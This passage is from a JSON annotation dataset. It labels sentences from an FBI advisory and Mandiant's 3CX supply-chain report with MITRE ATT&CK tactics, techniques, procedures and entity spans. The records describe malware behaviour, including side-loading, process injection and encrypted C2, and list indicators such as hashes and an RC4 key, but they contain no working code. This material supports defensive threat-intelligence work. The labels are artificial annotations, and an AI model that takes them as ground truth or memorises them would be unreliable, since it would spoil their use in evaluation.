behavior.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p4-s44-5b6001", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 4, "sentence_id": 44, "context_before": "• Enforce IP-based access restrictions and monitor and detect API usage, looking for unusual or malicious behavior.", "sentence_text": "TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s45-429c51", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 45, "context_before": "TLP:CLEAR", "sentence_text": "TLP:CLEAR\n• Monitor network logs and browser session activity for anomalous activity, to include indicators of data exfiltration.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s46-7b6cf7", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 46, "context_before": "TLP:CLEAR\n• Monitor network logs and browser session activity for anomalous activity, to include indicators of data exfiltration.", "sentence_text": "• Review all third-party integrations connecting to third-party software instances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s47-03da9e", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 47, "context_before": "• Review all third-party integrations connecting to third-party software instances.", "sentence_text": "Reporting Notice\nThe FBI encourages recipients of this document to report information concerning suspicious or criminal activity to the FBI Internet Crime Complaint Center at www.ic3.gov or their local FBI field office at www.fbi.gov/contact-us/field-offices or 1-800-CALL-FBI (225-5324).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s48-14e458", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 48, "context_before": "Reporting Notice\nThe FBI encourages recipients of this document to report information concerning suspicious or criminal activity to the FBI Internet Crime Complaint Center at www.ic3.gov or their local FBI field office at www.fbi.gov/contact-us/field-offices or 1-800-CALL-FBI (225-5324).", "sentence_text": "Indicators should always be evaluated in light of your complete information security situation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s49-e75cf9", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 49, "context_before": "Indicators should always be evaluated in light of your complete information security situation.", "sentence_text": "Your organization has no obligation to respond or provide information in response to this product.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s50-cb7469", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 50, "context_before": "Your organization has no obligation to respond or provide information in response to this product.", "sentence_text": "Administrative Note\nThe information in this document is being provided “as is” for informational purposes only.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s51-ac291b", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 51, "context_before": "Administrative Note\nThe information in this document is being provided “as is” for informational purposes only.", "sentence_text": "This product is marked TLP:CLEAR.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s52-1019ba", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 52, "context_before": "This product is marked TLP:CLEAR.", "sentence_text": "Subject to standard copyright rules, the information in this product may be shared without restriction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p5-s53-08a953", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 5, "sentence_id": 53, "context_before": "Subject to standard copyright rules, the information in this product may be shared without restriction.", "sentence_text": "TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s54-3ea372", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 54, "context_before": "TLP:CLEAR", "sentence_text": "TLP:CLEAR\nYour Feedback Regarding this Product is Critical Was this product of value to your organization?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s55-8b73bf", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 55, "context_before": "TLP:CLEAR\nYour Feedback Regarding this Product is Critical Was this product of value to your organization?", "sentence_text": "Was the content clear and concise?", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s56-fb89e4", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 56, "context_before": "Was the content clear and concise?", "sentence_text": "Your comments are very important to us and can be submitted anonymously.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s57-2c1590", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 57, "context_before": "Your comments are very important to us and can be submitted anonymously.", "sentence_text": "Please take a moment to complete the survey at the link below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s58-d5c2cf", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 58, "context_before": "Please take a moment to complete the survey at the link below.", "sentence_text": "Feedback should be specific to your experience with our written products to enable the FBI to make quick and continuous improvements to such products.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s59-a9e3d8", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 59, "context_before": "Feedback should be specific to your experience with our written products to enable the FBI to make quick and continuous improvements to such products.", "sentence_text": "Feedback may be submitted online here:\nPlease note that this survey is for feedback on content and value only.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s60-2bbbb9", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 60, "context_before": "Feedback may be submitted online here:\nPlease note that this survey is for feedback on content and value only.", "sentence_text": "Reporting of technical information regarding FLASH reports must be submitted through your local FBI Field Office.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-74_mitre_report-p6-s61-c2b7eb", "source": "mitre", "doc_id": "74_mitre_report", "page_number": 6, "sentence_id": 61, "context_before": "Reporting of technical information regarding FLASH reports must be submitted through your local FBI Field Office.", "sentence_text": "TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s1-e654a0", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "In March 2023, Mandiant Consulting responded to a supply chain compromise that affected 3CX Desktop App software.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" }, { "id": "T1195.002", "name": "Compromise Software Supply Chain" } ], "procedure": "Compromised the 3CX Desktop App software via a supply chain attack", "entities": [ { "text": "3CX Desktop App software", "start": 88, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "supply chain compromise that affected 3CX Desktop App software", "start": 50, "end": 112, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s2-54f988", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "In March 2023, Mandiant Consulting responded to a supply chain compromise that affected 3CX Desktop App software.", "sentence_text": "During this response, Mandiant identified that the initial compromise vector of 3CX’s network was via malicious software downloaded from Trading Technologies website.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "Compromised 3CX’s network via malicious software downloaded from Trading Technologies website", "entities": [ { "text": "malicious software", "start": 102, "end": 120, "label": "MalwareTool" }, { "text": "3CX’s network", "start": 80, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "Trading Technologies website", "start": 137, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "compromise ", "start": 59, "end": 70, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s3-b5521f", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "During this response, Mandiant identified that the initial compromise vector of 3CX’s network was via malicious software downloaded from Trading Technologies website.", "sentence_text": "This is the first time Mandiant has seen a software supply chain attack lead to another software supply chain attack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s4-627160", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "This is the first time Mandiant has seen a software supply chain attack lead to another software supply chain attack.", "sentence_text": "The affected software was 3CX DesktopApp 18.12.416 and earlier, which contained malicious code that ran a downloader, SUDDENICON, which in turn received additional command and control (C2) servers from encrypted icon files hosted on GitHub.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "Contained malicious code that ran a downloader, which received C2 servers from encrypted icon files hosted on GitHub", "entities": [ { "text": "malicious code", "start": 80, "end": 94, "label": "MalwareTool" }, { "text": "SUDDENICON", "start": 118, "end": 128, "label": "MalwareTool" }, { "text": "downloader", "start": 106, "end": 116, "label": "MalwareTool" }, { "text": "GitHub", "start": 233, "end": 239, "label": "Infrastructure_Indicator" }, { "text": "3CX DesktopApp 18.12.416 and earlier", "start": 26, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "encrypted icon files", "start": 202, "end": 222, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s5-206d0d", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "The affected software was 3CX DesktopApp 18.12.416 and earlier, which contained malicious code that ran a downloader, SUDDENICON, which in turn received additional command and control (C2) servers from encrypted icon files hosted on GitHub.", "sentence_text": "The decrypted C2 server was used to download a third stage identified as ICONICSTEALER, a dataminer that steals browser information.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Used the decrypted C2 server to download a third stage identified as ICONICSTEALER that steals browser information", "entities": [ { "text": "ICONICSTEALER", "start": 73, "end": 86, "label": "MalwareTool" }, { "text": "decrypted C2 server", "start": 4, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "download a third stage", "start": 36, "end": 58, "label": "Action" }, { "text": "steals browser information", "start": 105, "end": 131, "label": "Action" }, { "text": "dataminer", "start": 90, "end": 99, "label": "MalwareTool" } ] }, { "uid": "mitre-75_mitre_report-p1-s6-9eafcb", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "The decrypted C2 server was used to download a third stage identified as ICONICSTEALER, a dataminer that steals browser information.", "sentence_text": "Software Supply Chain Exploitation Explained investigation of the 3CX supply chain compromise has uncovered the initial intrusion vector: a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER, a software package provided by Trading Technologies (Figure 1).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195.002", "name": "Compromise Software Supply Chain" } ], "procedure": "Distributed malware-laced software package via tampered installer", "entities": [ { "text": "3CX", "start": 66, "end": 69, "label": "Infrastructure_Indicator" }, { "text": " X_TRADER", "start": 271, "end": 280, "label": "Infrastructure_Indicator" }, { "text": "Trading Technologies", "start": 313, "end": 333, "label": "Infrastructure_Indicator" }, { "text": "distributed", "start": 171, "end": 182, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s7-4a1147", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "Software Supply Chain Exploitation Explained investigation of the 3CX supply chain compromise has uncovered the initial intrusion vector: a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER, a software package provided by Trading Technologies (Figure 1).", "sentence_text": "VEILEDSIGNAL Backdoor Analysis X_TRADER_r7.17.90p608.exe (MD5: ef4ab22e565684424b4142b1294f1f4d) which led to the deployment of a malicious modular backdoor: VEILEDSIGNAL.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s8-39709d", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "VEILEDSIGNAL Backdoor Analysis X_TRADER_r7.17.90p608.exe (MD5: ef4ab22e565684424b4142b1294f1f4d) which led to the deployment of a malicious modular backdoor: VEILEDSIGNAL.", "sentence_text": "Although the X_TRADER platform was reportedly discontinued in 2020, it was still available for download from the legitimate Trading Technologies website in 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s9-49e9b0", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "Although the X_TRADER platform was reportedly discontinued in 2020, it was still available for download from the legitimate Trading Technologies website in 2022.", "sentence_text": "This file was signed with the subject “Trading Technologies International, Inc” and contained the executable file Setup.exe that was also signed with the same digital certificate.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.002", "name": "Code Signing" } ], "procedure": "Signed malicious file with legitimate digital certificate", "entities": [ { "text": "Setup.exe", "start": 114, "end": 123, "label": "Infrastructure_Indicator" }, { "text": "digital certificate", "start": 159, "end": 178, "label": "Infrastructure_Indicator" }, { "text": "Trading Technologies International, Inc", "start": 39, "end": 78, "label": "Infrastructure_Indicator" }, { "text": "signed", "start": 138, "end": 144, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s10-5a454c", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "This file was signed with the subject “Trading Technologies International, Inc” and contained the executable file Setup.exe that was also signed with the same digital certificate.", "sentence_text": "The code signing certificate used to digitally sign the malicious software was set to expire in October 2022.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.002", "name": "Code Signing" } ], "procedure": "Used expiring code signing certificate for malicious software", "entities": [ { "text": "malicious software", "start": 56, "end": 74, "label": "MalwareTool" }, { "text": "code signing certificate", "start": 4, "end": 28, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s11-2d17e3", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "The code signing certificate used to digitally sign the malicious software was set to expire in October 2022.", "sentence_text": "The installer contains and executes Setup.exe which drops two trojanized DLLs and a benign executable.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "The installer executes Setup.exe to deploy trojanized DLL payloads on the system.", "entities": [ { "text": "installer", "start": 4, "end": 13, "label": "MalwareTool" }, { "text": "contains and executes Setup.exe which drops two trojanized DLLs", "start": 14, "end": 77, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s12-78a781", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "The installer contains and executes Setup.exe which drops two trojanized DLLs and a benign executable.", "sentence_text": "Setup.exe uses the benign executable to side-load one of the malicious DLLs.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.002", "name": "DLL Side-Loading" } ], "procedure": "Uses benign executable to side-load malicious DLL", "entities": [ { "text": "Setup.exe", "start": 0, "end": 9, "label": "MalwareTool" }, { "text": "malicious DLLs", "start": 61, "end": 75, "label": "MalwareTool" }, { "text": "side-load", "start": 40, "end": 49, "label": "Action" }, { "text": "benign executable", "start": 19, "end": 36, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s13-1f1741", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Setup.exe uses the benign executable to side-load one of the malicious DLLs.", "sentence_text": "Side-loading relies on legitimate Windows executables to load and execute a malicious file that has been disguised as a legitimate dependency.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s14-2f011d", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Side-loading relies on legitimate Windows executables to load and execute a malicious file that has been disguised as a legitimate dependency.", "sentence_text": "The loaded malicious DLLs contains and uses SIGFLIP and DAVESHELL to decrypt and load the payload into memory from the other dropped malicious executable.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Uses SIGFLIP and DAVESHELL to decrypt and load payload into memory", "entities": [ { "text": "SIGFLIP", "start": 44, "end": 51, "label": "MalwareTool" }, { "text": "malicious DLLs", "start": 11, "end": 25, "label": "MalwareTool" }, { "text": "DAVESHELL", "start": 56, "end": 65, "label": "MalwareTool" }, { "text": "decrypt", "start": 69, "end": 76, "label": "Action" }, { "text": "load", "start": 81, "end": 85, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s15-8aa13f", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "The loaded malicious DLLs contains and uses SIGFLIP and DAVESHELL to decrypt and load the payload into memory from the other dropped malicious executable.", "sentence_text": "VEILEDSIGNAL relies on the two extracted modules for process injection and communications with the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Uses extracted modules for process injection and C2 communications", "entities": [ { "text": "VEILEDSIGNAL", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "C2 server", "start": 99, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "process injection", "start": 53, "end": 70, "label": "Action" }, { "text": "communications", "start": 75, "end": 89, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s16-db4565", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "VEILEDSIGNAL relies on the two extracted modules for process injection and communications with the C2 server.", "sentence_text": "The process injection module injects the C2 module in the first found process instance of Chrome, Firefox, or Edge.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Injects C2 module into browser processes", "entities": [ { "text": "Firefox", "start": 98, "end": 105, "label": "Infrastructure_Indicator" }, { "text": " Edge", "start": 109, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "Chrome", "start": 90, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "injects", "start": 29, "end": 36, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s17-54ea6c", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "The process injection module injects the C2 module in the first found process instance of Chrome, Firefox, or Edge.", "sentence_text": "It also monitors the named pipe and reinjects the communication module if necessary.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Monitors named pipe and reinjects communication module", "entities": [ { "text": "reinjects", "start": 36, "end": 45, "label": "Action" }, { "text": "monitors", "start": 8, "end": 16, "label": "Action" }, { "text": "named pipe", "start": 21, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s18-99b11a", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "It also monitors the named pipe and reinjects the communication module if necessary.", "sentence_text": "The C2 module creates a Windows named pipe and listens for incoming communications, which it then sends to the C2 server encrypted with AES-256 in Galois Counter Mode (GCM).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Creates named pipe and sends encrypted communications to C2 server", "entities": [ { "text": "Windows named pipe", "start": 24, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "C2 server", "start": 111, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "creates", "start": 14, "end": 21, "label": "Action" }, { "text": "listens", "start": 47, "end": 54, "label": "Action" }, { "text": "sends", "start": 98, "end": 103, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s19-13028b", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "The C2 module creates a Windows named pipe and listens for incoming communications, which it then sends to the C2 server encrypted with AES-256 in Galois Counter Mode (GCM).", "sentence_text": "The C2 configuration of the identified sample of VEILEDSIGNAL (MD5: c6441c961dcad0fe127514a918eaabd4) relied on the following hard-coded URL:\nVEILEDSIGNAL Similarities and Code Comparison", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s20-abf4dd", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "The C2 configuration of the identified sample of VEILEDSIGNAL (MD5: c6441c961dcad0fe127514a918eaabd4) relied on the following hard-coded URL: VEILEDSIGNAL Similarities and Code Comparison", "sentence_text": "The compromised X_TRADER and 3CXDesktopApp applications both contain, extract, and run a payload in the same way, although the final payload is different.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Compromised applications extract and execute embedded payloads on the system.", "entities": [ { "text": "X_TRADER", "start": 16, "end": 24, "label": "MalwareTool" }, { "text": "3CXDesktopApp", "start": 29, "end": 42, "label": "MalwareTool" }, { "text": "extract, and run a payload", "start": 70, "end": 96, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s21-3a154e", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "The compromised X_TRADER and 3CXDesktopApp applications both contain, extract, and run a payload in the same way, although the final payload is different.", "sentence_text": "Mandiant analyzed these samples and observed the following similarities:\nUsage of the same RC4 key 3jB(2bsG#@c7 in the SIGFLIP tool configuration to encrypt and decrypt the payload.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Use RC4 key to encrypt and decrypt payload", "entities": [ { "text": "SIGFLIP", "start": 119, "end": 126, "label": "MalwareTool" }, { "text": "RC4 key 3jB(2bsG#@c7", "start": 91, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "encrypt", "start": 149, "end": 156, "label": "Action" }, { "text": "decrypt", "start": 161, "end": 168, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s22-e85b00", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "Mandiant analyzed these samples and observed the following similarities:\nUsage of the same RC4 key 3jB(2bsG#@c7 in the SIGFLIP tool configuration to encrypt and decrypt the payload.", "sentence_text": "Reliance on\nDAVESHELL\n, a publicly available open-source project that converts PE-COFF files to position-independent code or shellcode and that leverages reflective loading techniques to load the payload in memory.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" }, { "id": "T1620", "name": "Reflective Code Loading" } ], "procedure": "Uses DAVESHELL to convert files to shellcode and load payload in memory", "entities": [ { "text": "DAVESHELL", "start": 12, "end": 21, "label": "MalwareTool" }, { "text": "converts", "start": 70, "end": 78, "label": "Action" }, { "text": "load", "start": 187, "end": 191, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s23-6309c3", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "Reliance on\nDAVESHELL\n, a publicly available open-source project that converts PE-COFF files to position-independent code or shellcode and that leverages reflective loading techniques to load the payload in memory.", "sentence_text": "Use of the hardcoded cookie variable __tutma in the payloads.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Uses hardcoded cookie variable in payloads", "entities": [ { "text": "cookie variable __tutma", "start": 21, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s24-7680f4", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "Use of the hardcoded cookie variable __tutma in the payloads.", "sentence_text": "Both payloads encrypt data with AES-256 GCM cipher.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1573.001", "name": "Symmetric Cryptography" } ], "procedure": "Encrypt data with AES-256 GCM cipher", "entities": [ { "text": "encrypt", "start": 14, "end": 21, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s25-2ac040", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "Both payloads encrypt data with AES-256 GCM cipher.", "sentence_text": "Compromise of the 3CX Build Environment", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s26-0cedad", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Compromise of the 3CX Build Environment", "sentence_text": "The attacker used a compiled version of the publicly available Fast Reverse Proxy project , to move laterally within the 3CX organization during the attack.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1570", "name": "Lateral Tool Transfer" } ], "procedure": "Used Fast Reverse Proxy to move laterally within 3CX organization", "entities": [ { "text": "Fast Reverse Proxy", "start": 63, "end": 81, "label": "MalwareTool" }, { "text": "move laterally", "start": 95, "end": 109, "label": "Action" }, { "text": "3CX organization", "start": 121, "end": 137, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-75_mitre_report-p1-s27-783fb2", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "The attacker used a compiled version of the publicly available Fast Reverse Proxy project , to move laterally within the 3CX organization during the attack.", "sentence_text": "The file MsMpEng.exe (MD5: 19dbffec4e359a198daf4ffca1ab9165), was dropped in C:\\Windows\\System32 by the threat actor.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Dropped MsMpEng.exe file in System32 directory", "entities": [ { "text": " threat actor", "start": 103, "end": 116, "label": "ThreatActor" }, { "text": "MsMpEng.exe", "start": 9, "end": 20, "label": "MalwareTool" }, { "text": "MD5: 19dbffec4e359a198daf4ffca1ab9165", "start": 22, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "dropped", "start": 66, "end": 73, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s28-fe0ce1", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "The file MsMpEng.exe (MD5: 19dbffec4e359a198daf4ffca1ab9165), was dropped in C:\\Windows\\System32 by the threat actor.", "sentence_text": "DLL search order hijacking through the IKEEXT service and ran with LocalSystem privileges.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Performed DLL search order hijacking through IKEEXT service", "entities": [ { "text": "IKEEXT service", "start": 39, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "DLL search order hijacking", "start": 0, "end": 26, "label": "Action" }, { "text": "ran", "start": 58, "end": 61, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s29-ef90ff", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "DLL search order hijacking through the IKEEXT service and ran with LocalSystem privileges.", "sentence_text": "The macOS build server was compromised with POOLRAT backdoor using Launch Daemons as a persistence mechanism.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.004", "name": "Launch Daemon" } ], "procedure": "Compromised macOS build server with POOLRAT backdoor", "entities": [ { "text": "POOLRAT", "start": 44, "end": 51, "label": "MalwareTool" }, { "text": " macOS build server", "start": 3, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "Launch Daemons", "start": 67, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 27, "end": 38, "label": "Action" } ] }, { "uid": "mitre-75_mitre_report-p1-s30-4fdef6", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "The macOS build server was compromised with POOLRAT backdoor using Launch Daemons as a persistence mechanism.", "sentence_text": "Previous reporting mentioned the macOS build server was compromised with SIMPLESEA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s31-b1f5ff", "source": "mitre", "doc_id": "75_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Previous reporting mentioned the macOS build server was compromised with SIMPLESEA.", "sentence_text": "Threat Actor Spotlight: UNC4736 UNC4736 demonstrates varying degrees of overlap with multiple North Korean operators tracked by Mandiant Intelligence, especially with those involved in financially-motivated cybercrime operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-75_mitre_report-p1-s32-e4c9fe", "source": "mitre", "doc_id": 